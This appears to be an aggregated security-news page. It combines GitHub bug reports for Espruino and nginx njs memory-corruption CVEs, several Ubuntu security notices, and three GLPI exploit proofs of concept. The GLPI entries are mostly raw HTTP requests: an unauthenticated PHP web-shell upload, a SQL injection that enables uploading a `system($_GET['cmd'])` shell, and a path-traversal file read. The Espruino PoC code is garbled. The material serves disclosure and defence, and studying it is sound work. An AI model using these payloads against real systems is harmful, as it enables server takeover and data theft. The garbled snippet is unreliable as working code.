An issue found in Espruino Espruino 6ea4c0a allows an attacker to execute arbitrrary code via oldFunc parameter of the jswrap_object.c:jswrap_function_replacewith endpoint.

**env**

Ubuntu 18.04  
Espruino 6ea4c0a

**bug**

This is a critical bug which will cause memory corruption at last, thus may cause potential remote code execution threat to the users.

It happens at jswrap_object.c:jswrap_function_replacewith:, so if we pass the parameter oldFunc with a null pointer, it may crash. If we provide the oldFunc with another address or another number, it may cause remote code execution.

void jswrap\_function\_replaceWith(JsVar \*oldFunc, JsVar \*newFunc) {
  if (!jsvIsFunction(newFunc)) {
    jsExceptionHere(JSET\_TYPEERROR, "First argument of replaceWith should be a function - ignoring");
    return;
  }
  // If old was native or vice versa...
  if (jsvIsNativeFunction(oldFunc) != jsvIsNativeFunction(newFunc)) {
    if (jsvIsNativeFunction(newFunc))
      oldFunc->flags |= JSV\_NATIVE;
    else
      oldFunc->flags &= ~JSV\_NATIVE;
  }
  // If old fn started with 'return' or vice versa...
  if (jsvIsFunctionReturn(oldFunc) != jsvIsFunctionReturn(newFunc)) {
    if (jsvIsFunctionReturn(newFunc))
      oldFunc->flags = (oldFunc->flags&~JSV\_VARTYPEMASK) |JSV\_FUNCTION\_RETURN;
    else
      oldFunc->flags = (oldFunc->flags&~JSV\_VARTYPEMASK) |JSV\_FUNCTION;
  }

**poc**

var a "should equal";
for (var i in a)
    a\[i\]\=i;

function test(a,b) {
    return 1;
}

E.mapInPlace.replaceWith.call(a, function(x) {
    return test(\[\].map.call("Hello", function(x) {
        return x + 1;
    }), "H1,e1,l1,l1,o1");
});

CVE-2020-19693: A memory corruption bug in the jswrap_object.c · Issue #1684 · espruino/Espruino

Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)

**bug**

So, actually this is a logic bug, happened under an really interesting circumstance.  
the buggy function is the njs\_module\_read in the file njs\_module.c

if (fstat(fd, &sb) == -1) {
        goto fail;
    }

    text->length = nxt\_length(NJS\_MODULE\_START);

    if (S\_ISREG(sb.st\_mode) && sb.st\_size) {
        text->length += sb.st\_size;
    }

    text->length += nxt\_length(NJS\_MODULE\_END);

    text->start = nxt\_mp\_alloc(vm->mem\_pool, text->length);
    if (text->start == NULL) {
        goto fail;
    }

    p = nxt\_cpymem(text->start, NJS\_MODULE\_START, nxt\_length(NJS\_MODULE\_START));

    n = read(fd, p, sb.st\_size);

as you can see, it read the sb.st\_size and sb.st\_mode with function fstat. However if we dont provide a common .js file. the S\_ISREG(sb.st\_mode) will be 0. text->length wont be updated.  
and read(fd, p, sb.st\_size); still read sb.st\_size bytes into the p. p is on the heap. So we can overflow to the next chunk on the heap....

**poc**

CVE-2020-19692: Heap based buffer overflow in njs_module.c · Issue #187 · nginx/njs

Ubuntu Security Notice 5995-1 - It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possible execute arbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    =========================================================================Ubuntu Security Notice USN-5995-1April 04, 2023vim vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 14.04 ESMSummary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS,and Ubuntu 22.04 LTS. (CVE-2022-0413, CVE-2022-1629, CVE-2022-1674,CVE-2022-1733, CVE-2022-1735, CVE-2022-1785, CVE-2022-1796, CVE-2022-1851,CVE-2022-1898, CVE-2022-1942, CVE-2022-1968, CVE-2022-2124, CVE-2022-2125,CVE-2022-2126, CVE-2022-2129, CVE-2022-2175, CVE-2022-2183, CVE-2022-2206,CVE-2022-2304, CVE-2022-2345, CVE-2022-2581)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04LTS. (CVE-2022-1720, CVE-2022-2571, CVE-2022-2845, CVE-2022-2849,CVE-2022-2923)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-1927,CVE-2022-2344)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS,and Ubuntu 22.10. (CVE-2022-2946)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10.(CVE-2022-2980)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  vim                             2:9.0.0242-1ubuntu1.3  vim-athena                      2:9.0.0242-1ubuntu1.3  vim-gtk3                        2:9.0.0242-1ubuntu1.3  vim-motif                       2:9.0.0242-1ubuntu1.3  vim-nox                         2:9.0.0242-1ubuntu1.3  vim-tiny                        2:9.0.0242-1ubuntu1.3Ubuntu 22.04 LTS:  vim                             2:8.2.3995-1ubuntu2.5  vim-athena                      2:8.2.3995-1ubuntu2.5  vim-gtk                         2:8.2.3995-1ubuntu2.5  vim-gtk3                        2:8.2.3995-1ubuntu2.5  vim-nox                         2:8.2.3995-1ubuntu2.5  vim-tiny                        2:8.2.3995-1ubuntu2.5Ubuntu 20.04 LTS:  vim                             2:8.1.2269-1ubuntu5.13  vim-athena                      2:8.1.2269-1ubuntu5.13  vim-gtk                         2:8.1.2269-1ubuntu5.13  vim-gtk3                        2:8.1.2269-1ubuntu5.13  vim-nox                         2:8.1.2269-1ubuntu5.13  vim-tiny                        2:8.1.2269-1ubuntu5.13Ubuntu 18.04 LTS:  vim                             2:8.0.1453-1ubuntu1.12  vim-athena                      2:8.0.1453-1ubuntu1.12  vim-gnome                       2:8.0.1453-1ubuntu1.12  vim-gtk                         2:8.0.1453-1ubuntu1.12  vim-gtk3                        2:8.0.1453-1ubuntu1.12  vim-nox                         2:8.0.1453-1ubuntu1.12  vim-tiny                        2:8.0.1453-1ubuntu1.12Ubuntu 14.04 ESM:  vim                             2:7.4.052-1ubuntu3.1+esm8  vim-athena                      2:7.4.052-1ubuntu3.1+esm8  vim-gnome                       2:7.4.052-1ubuntu3.1+esm8  vim-gtk                         2:7.4.052-1ubuntu3.1+esm8  vim-nox                         2:7.4.052-1ubuntu3.1+esm8  vim-tiny                        2:7.4.052-1ubuntu3.1+esm8In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5995-1  CVE-2022-0413, CVE-2022-1629, CVE-2022-1674, CVE-2022-1720,  CVE-2022-1733, CVE-2022-1735, CVE-2022-1785, CVE-2022-1796,  CVE-2022-1851, CVE-2022-1898, CVE-2022-1927, CVE-2022-1942,  CVE-2022-1968, CVE-2022-2124, CVE-2022-2125, CVE-2022-2126,  CVE-2022-2129, CVE-2022-2175, CVE-2022-2183, CVE-2022-2206,  CVE-2022-2304, CVE-2022-2344, CVE-2022-2345, CVE-2022-2571,  CVE-2022-2581, CVE-2022-2845, CVE-2022-2849, CVE-2022-2923,  CVE-2022-2946, CVE-2022-2980Package Information:  https://launchpad.net/ubuntu/+source/vim/2:9.0.0242-1ubuntu1.3  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.5  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.13  https://launchpad.net/ubuntu/+source/vim/2:8.0.1453-1ubuntu1.12

Ubuntu Security Notice USN-5995-1

Ubuntu Security Notice 5994-1 - It was discovered that HAProxy incorrectly initialized certain connection buffers. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5994-1  
April 03, 2023

haproxy vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

HAProxy could be made to expose sensitive information over the network.

Software Description:  
- haproxy: fast and reliable load balancing reverse proxy

Details:

It was discovered that HAProxy incorrectly initialized certain connection  
buffers. A remote attacker could possibly use this issue to obtain  
sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   haproxy                         2.4.18-1ubuntu1.3

Ubuntu 22.04 LTS:  
   haproxy                         2.4.18-0ubuntu1.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5994-1  
   CVE-2023-0836

Package Information:  
   https://launchpad.net/ubuntu/+source/haproxy/2.4.18-1ubuntu1.3  
   https://launchpad.net/ubuntu/+source/haproxy/2.4.18-0ubuntu1.3

Ubuntu Security Notice USN-5994-1

Ubuntu Security Notice 5993-1 - Demi Marie Obenour discovered that the Samba LDAP server incorrectly handled certain confidential attribute values. A remote authenticated attacker could possibly use this issue to obtain certain sensitive information. Andrew Bartlett discovered that the Samba AD DC admin tool incorrectly sent passwords in cleartext. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5993-1  
April 03, 2023

samba vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Samba could be made to expose sensitive information over the network.

Software Description:  
- samba: SMB/CIFS file, print, and login server for Unix

Details:

Demi Marie Obenour discovered that the Samba LDAP server incorrectly  
handled certain confidential attribute values. A remote authenticated  
attacker could possibly use this issue to obtain certain sensitive  
information. (CVE-2023-0614)

Andrew Bartlett discovered that the Samba AD DC admin tool incorrectly  
sent passwords in cleartext. A remote attacker could possibly use this  
issue to obtain sensitive information. (CVE-2023-0922)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   samba                           2:4.16.8+dfsg-0ubuntu1.1

Ubuntu 22.04 LTS:  
   samba                           2:4.15.13+dfsg-0ubuntu1.1

Ubuntu 20.04 LTS:  
   samba                           2:4.15.13+dfsg-0ubuntu0.20.04.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5993-1  
   CVE-2023-0614, CVE-2023-0922

Package Information:  
   https://launchpad.net/ubuntu/+source/samba/2:4.16.8+dfsg-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/samba/2:4.15.13+dfsg-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/samba/2:4.15.13+dfsg-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5993-1

Ubuntu Security Notice 5992-1 - Demi Marie Obenour discovered that ldb, when used with Samba, incorrectly handled certain confidential attribute values. A remote authenticated attacker could possibly use this issue to obtain certain sensitive information.

    ==========================================================================Ubuntu Security Notice USN-5992-1April 03, 2023ldb vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:ldb could be made to expose sensitive information over the network.Software Description:- ldb: LDAP-like embedded databaseDetails:Demi Marie Obenour discovered that ldb, when used with Samba, incorrectlyhandled certain confidential attribute values. A remote authenticatedattacker could possibly use this issue to obtain certain sensitiveinformation.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   libldb2                         2:2.4.4-0ubuntu0.22.04.2Ubuntu 20.04 LTS:   libldb2                         2:2.4.4-0ubuntu0.20.04.2After a standard system update you need to restart applications using ldb,such as Samba, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5992-1   CVE-2023-0614Package Information:   https://launchpad.net/ubuntu/+source/ldb/2:2.4.4-0ubuntu0.22.04.2   https://launchpad.net/ubuntu/+source/ldb/2:2.4.4-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5992-1

Ubuntu Security Notice 5966-3 - USN-5966-1 fixed vulnerabilities in amanda. Unfortunately that update caused a regression and was reverted in USN-5966-2. This update provides security fixes for Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-5966-3  
April 03, 2023

amanda regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in amanda.

Software Description:  
- amanda: Advanced Maryland Automatic Network Disk Archiver (Client)

Details:

USN-5966-1 fixed vulnerabilities in amanda. Unfortunately that update  
caused a regression and was reverted in USN-5966-2. This update provides  
security fixes for Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04  
LTS and Ubuntu 18.04 LTS.

We apologize for the inconvenience.

Original advisory details:

Maher Azzouzi discovered an information disclosure vulnerability in the  
calcsize binary within amanda. calcsize is a suid binary owned by root that  
could possibly be used by a malicious local attacker to expose sensitive  
file system information. (CVE-2022-37703)

Maher Azzouzi discovered a privilege escalation vulnerability in the  
rundump binary within amanda. rundump is a suid binary owned by root that  
did not perform adequate sanitization of environment variables or  
commandline options and could possibly be used by a malicious local  
attacker to escalate privileges. (CVE-2022-37704)

Maher Azzouzi discovered a privilege escalation vulnerability in the runtar  
binary within amanda. runtar is a suid binary owned by root that did not  
perform adequate sanitization of commandline options and could possibly be  
used by a malicious local attacker to escalate privileges. (CVE-2022-37705)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
amanda-client 1:3.5.1-9ubuntu0.3

Ubuntu 22.04 LTS:  
amanda-client 1:3.5.1-8ubuntu1.3

Ubuntu 20.04 LTS:  
amanda-client 1:3.5.1-2ubuntu0.3

Ubuntu 18.04 LTS:  
amanda-client 1:3.5.1-1ubuntu0.3

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5966-3  
https://ubuntu.com/security/notices/USN-5966-1  
https://launchpad.net/bugs/2012536  
CVE-2022-37703, CVE-2022-37704, CVE-2022-37705

Package Information:  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-9ubuntu0.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-8ubuntu1.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-2ubuntu0.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-1ubuntu0.3

Ubuntu Security Notice USN-5966-3

GLPI Cartography versions prior to 6.0.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 11 Jun 2022# Application: GLPI Cartography < 6.0.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/positions# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-34128# PoCPOST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Length: 39Origin: http://192.168.56.113Connection: close<?php echo system($_GET["cmd"]); ?>

GLPI Cartography Shell Upload

GLPI versions 10.0.0 through 10.0.2 suffer from a remote SQL injection vulnerability that can lead to remote code execution.

    # ADVISORY INFORMATION# Exploit Title: GLPI  v10.0.2 - SQL Injection (Authentication Depends on Configuration)# Date of found: 11 Jun 2022# Application: GLPI >=10.0.0, < 10.0.3# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31056# PoCPOST /front/change.form.php HTTP/1.1Host: acme.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156Content-Length: 4836Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="id"0-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_glpi_csrf_token"752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_actors"{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}-----------------------------190705055020145329172298897156--If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows.POST /ajax/fileupload.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841Content-Length: 559Origin: http://acme.comCookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="name"_uploader_filename-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="showfilesize"1-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"Content-Type: application/x-phpOutput:  <?php echo system($_GET['cmd']); ?>-----------------------------102822935214007887302871396841--# POC URLhttp://192.168.56.113/files/_tmp/poc.php?cmd=

GLPI 10.0.2 SQL Injection / Remote Code Execution

GLPI Activity versions prior to 3.1.0 suffer from a local file inclusion vulnerability.

    # Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin# Date of found: 11 Jun 2022# Application: GLPI Activity < 3.1.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/activity# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34125# PoCGET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: close

Tag

#ubuntu